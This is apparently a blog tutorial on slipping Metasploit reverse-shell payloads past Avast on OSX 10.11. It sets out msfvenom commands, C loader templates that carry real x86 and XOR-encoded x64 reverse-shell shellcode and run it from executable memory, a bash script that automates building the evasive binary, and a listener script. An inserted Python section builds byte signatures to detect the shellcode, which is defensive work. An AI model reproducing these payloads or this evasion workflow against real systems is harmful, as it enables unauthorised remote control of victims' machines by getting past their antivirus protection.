Bypassing antivirus on OSX 10.11 with Metasploit – Avast

Let's see how good some of the antivirus products are nowadays on a modern OSX system. Simply googling "OSX antivirus", the first hit I get is Avast Free Mac Security, so the first part of the testing runs will be on OSX 10.11.4 El Capitan and Avast 12.7.

Installation is pretty straightforward, so let's see how Metasploit holds up against it.

Let's try a simple OSX binary payload, generated on our Linux machine with the Metasploit framework installed:

# ./msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f macho > test.osx
# ./msfvenom -p osx/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f macho > test64.osx

test.osx and test64.osx get detected immediately on the SMB share.

Now let's see our luck with a Java jar payload:

# ./msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 > test.jar

Gets detected upon execution of test.jar on OSX (the Java JDK is needed for this).

So our old tricks don't work anymore. We need to be smarter and use some customization, starting with the x64/xor encoder:

./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.1.101 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho > newtest.64.osx

newtest.64.osx gets detected immediately on the SMB share.

So we will need to compile our own code to bypass Avast.

Go to hpc.sourceforge.net and download gcc 7.1 to build some OSX 10.11 binaries.
That's pretty standard: once the gcc7.1.tar is downloaded you extract it to /usr on OSX and let the Xcode console tools install.

Let's try some custom C code. First dump the payload in C array format:

./msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f c > shellcode.c

And paste the array from shellcode.c into this template:

#include <stdio.h>
#include <string.h>

/* osx/x86/shell_reverse_tcp as emitted by msfvenom -f c (LHOST 192.168.1.101, LPORT 443) */
unsigned char code[] =
"\x68\xc0\xa8\x01\x65\x68\xff\x02\x01\xbb\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80";

int main(void)
{
    /* call straight into the byte array; no executable mapping is set up here */
    int (*ret)() = (int (*)())code;
    ret();
    return 0;
}

Copy the code to OSX and compile it:

$ gcc test.c -o test.osx

Gets picked up by Avast immediately during compilation.

So let's see what encoders/payloads we have in msfvenom that can be used for OSX (only the relevant lines of the listing are shown):

$ ./msfvenom --list
x64/xor                           normal  XOR Encoder
x64/zutto_dekiru                  manual  Zutto Dekiru
osx/x64/dupandexecve/bind_tcp     dup2 socket in edi, then execve. Listen, read length, read buffer, execute
osx/x64/dupandexecve/reverse_tcp  dup2 socket in edi, then execve. Connect, read length, read buffer, execute
osx/x64/shell_bind_tcp            Bind an arbitrary command to an arbitrary port
osx/x64/shell_find_tag            Spawn a shell on an established connection (proxy/nat safe)
osx/x64/shell_reverse_tcp         Connect back to attacker and spawn a command shell

So let's try one more piece of custom code, this time with the x64 payload run through the x64/xor encoder:

./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.1.101 LPORT=443 -a x64 --platform OSX -e x64/xor -f c -o test.c

Add the buf[] array from test.c to this template:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

/* osx/x64/shell_reverse_tcp, x64/xor-encoded, as emitted by msfvenom -f c */
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xf2\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xe6\x84\xaf\xdf\x92\x78\x92\x7c\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x5e\xe5\xaf\xdf\x90\x12"
"\x90\x23\x8c\x85\xf1\x97\xa3\xaa\x9d\x79\xaf\x0d\x6b\x97\x1b"
"\xbf\x2a\x1e\xe6\x84\xad\x97\xa3\x8e\xc4\x34\x58\x84\xad\xde"
"\x29\xb8\x3a\x7d\x83\xd2\xe7\x56\x74\x12\x82\x26\xe9\x81\xe3"
"\x56\x75\xc0\xc8\x7c\xe6\x86\xe7\xee\x64\x77\x97\xc4\xbc\x84"
"\xaf\xdd\xda\x87\x54\x73\xe3\xcc\x9e\x1f\x2a\x43\x92\x7c\xe4"
"\x6c\xa7\xdf\x92\x78\xbd\x1e\x8f\xea\x80\xac\xfa\x78\xda\xf7"
"\xda\xa0\xe7\xee\x40\x2a\xc5\x34\x6f\x62\xa0\xda\x92\x78\x92"
"\x7c";

int main(int argc, char **argv)
{
    /* map one anonymous RWX page, copy the encoded payload into it and call it */
    void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    printf("ret: %p\n", ptr);
    memcpy(ptr, buf, sizeof buf);
    void (*fp)() = (void (*)())ptr;
    fp();
    return 0;
}

On OSX compile the code with GCC and run it:

$ gcc newtest.c -o newtest.osx 
$ ./newtest.osx

This one works well: we bypass Avast on OSX and get a reverse shell.
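What separates the three attempts above is not the payload logic but which bytes stay constant from one msfvenom run to the next. The x86 array in the first template ends with the same execve("/bin//sh") sequence whatever LHOST and LPORT are, and the x64/xor output starts with the same decoder loop whatever key the encoder picks; only the IP/port bytes, the block count and the 8-byte key change. The following Python scanner is an added example, not code from the original post, and it says nothing about the rules Avast actually ships: it builds two wildcard signatures from nothing but the bytes printed on this page, parses the "\xNN" literals out of a C template the way the page embeds them, and shows that the x86 tail and the x64/xor stub are found regardless of those variable fields. The signature names, the replacement key and the benign buffer are constructed for the example.

```python
import re

# Signatures as YARA-style hex strings. Every fixed byte comes from the shellcode
# printed on this page; "??" wildcards the fields that change between msfvenom
# runs (IP/port in the x86 payload, block count and XOR key in the x64/xor stub).
SIGNATURES = {
    # osx/x86/shell_reverse_tcp tail: push "//sh"; push "/bin"; mov ebx,esp;
    # push eax; push esp; push esp; push ebx; push eax; mov al,0x3b; int 0x80
    "osx_x86_execve_binsh_tail":
        "68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 54 54 53 50 b0 3b cd 80",
    # x64/xor decoder loop: xor rcx,rcx; sub rcx,-N; lea rax,[rip-0x11];
    # mov rbx,KEY; xor [rax+0x27],rbx; sub rax,-8; loop
    "msf_x64_xor_decoder_stub":
        "48 31 c9 48 81 e9 ?? ?? ?? ?? 48 8d 05 ef ff ff ff 48 bb "
        "?? ?? ?? ?? ?? ?? ?? ?? 48 31 58 27 48 2d f8 ff ff ff e2 f4",
}


def compile_hex_pattern(pattern):
    """Translate 'aa bb ?? cc' into a bytes regex ('??' matches any single byte)."""
    parts = [b"." if tok == "??" else b"\\x%02x" % int(tok, 16)
             for tok in pattern.split()]
    return re.compile(b"".join(parts), re.DOTALL)


COMPILED = {name: compile_hex_pattern(p) for name, p in SIGNATURES.items()}


def scan_bytes(blob):
    """Return [(signature_name, offset), ...] for every signature hit in blob."""
    return [(name, m.start()) for name, rx in COMPILED.items()
            for m in rx.finditer(blob)]


_C_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def extract_c_byte_strings(source):
    """Recover the bytes of "\\xNN" literals from C source text, in order. The
    loader templates on the page embed the payload this way, and the compiler
    copies the array unchanged into the binary's data section."""
    return bytes(int(h, 16) for h in _C_HEX_ESCAPE.findall(source))


def with_new_key(blob, key):
    """Overwrite the 8-byte key field (offset 19) of an x64/xor stub. Constructed
    only to show the signature ignores the key; the body is not re-encoded."""
    assert len(key) == 8
    return blob[:19] + key + blob[27:]


# Array literals copied from the two templates on this page (test input only).
X86_TEMPLATE = r'''
unsigned char code[] =
"\x68\xc0\xa8\x01\x65\x68\xff\x02\x01\xbb\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80";
'''
X64_TEMPLATE = r'''
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xf2\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xe6\x84\xaf\xdf\x92\x78\x92\x7c\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x5e\xe5\xaf\xdf\x90\x12"
"\x90\x23\x8c\x85\xf1\x97\xa3\xaa\x9d\x79\xaf\x0d\x6b\x97\x1b"
"\xbf\x2a\x1e\xe6\x84\xad\x97\xa3\x8e\xc4\x34\x58\x84\xad\xde"
"\x29\xb8\x3a\x7d\x83\xd2\xe7\x56\x74\x12\x82\x26\xe9\x81\xe3"
"\x56\x75\xc0\xc8\x7c\xe6\x86\xe7\xee\x64\x77\x97\xc4\xbc\x84"
"\xaf\xdd\xda\x87\x54\x73\xe3\xcc\x9e\x1f\x2a\x43\x92\x7c\xe4"
"\x6c\xa7\xdf\x92\x78\xbd\x1e\x8f\xea\x80\xac\xfa\x78\xda\xf7"
"\xda\xa0\xe7\xee\x40\x2a\xc5\x34\x6f\x62\xa0\xda\x92\x78\x92"
"\x7c";
'''


def demo():
    """Scan both page templates, a re-keyed stub and a benign buffer."""
    x86 = extract_c_byte_strings(X86_TEMPLATE)
    x64 = extract_c_byte_strings(X64_TEMPLATE)
    rekeyed = with_new_key(x64, bytes(range(8)))   # constructed replacement key
    return {
        "x86_len": len(x86), "x86_hits": scan_bytes(x86),
        "x64_len": len(x64), "x64_hits": scan_bytes(x64),
        "rekeyed_hits": scan_bytes(rekeyed),
        "benign_hits": scan_bytes(b"this buffer holds no shellcode at all" * 3),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The x86 tail is found at offset 44 of the 65-byte array and the x64/xor stub at offset 0 of the 151-byte blob (39 bytes of decoder followed by 14 encoded qwords, which is what the sub rcx,-14 in the stub counts), and swapping the key leaves the stub hit in place. Since the mmap/memcpy/indirect-call loader changes where those bytes live at run time but not what they are in the file, a scanner that keys on these sequences would locate them in the compiled newtest.osx as well as in the msfvenom macho; which of the two a given product actually flags depends on its own rules, not on anything this example can tell you.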

Here is a generator for the above to make life easier: OSX-x64-payload-generator.sh

Update: I had a bug here; forgot to include the $port and $IP variables :) – fixed

#!/bin/bash
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
    echo '[*] Found msfvenom in current path ........ good'
else
    echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
    exit 1
fi
echo '[*] Cleaning up '
rm -f osx64-payload.c
./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST="$IP" LPORT="$port" -a x64 --platform OSX -e x64/xor -f c -o test.c
# assemble: includes, then the msfvenom-generated buf[] array, then the loader's main()
cat > temp.c <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

EOF
cat test.c >> temp.c
cat >> temp.c <<'EOF'

int main(int argc, char **argv)
{
    void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    printf("ret: %p\n", ptr);
    memcpy(ptr, buf, sizeof buf);
    void (*fp)() = (void (*)())ptr;
    fp();
    return 0;
}
EOF
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
    echo '[*] osx64-payload.c generated ...'
    ls -la osx64-payload.c
else
    echo '[-] Something went wrong .. '
    exit 1
fi

And the listener, LISTENER-MAC-LATEST.sh:

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
# write a one-line wrapper that starts multi/handler for the payload used above
cat > run.listener.sh <<EOF
./msfconsole -x "use exploit/multi/handler; set PAYLOAD osx/x64/shell_reverse_tcp; set LHOST $host; set LPORT $port; run"
EOF
chmod +x run.listener.sh
./run.listener.sh

Video (embedded in the original post, not reproduced here)

This post and the other parts of the series:

https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/

https://astr0baby.wordpress.com/2017/07/14/bypassing-antivirus-on-osx-10-11-with-metasploit-bitdefender/

https://astr0baby.wordpress.com/2017/07/14/bypassing-antivirus-on-osx-10-11-with-metasploit-kaspersky/
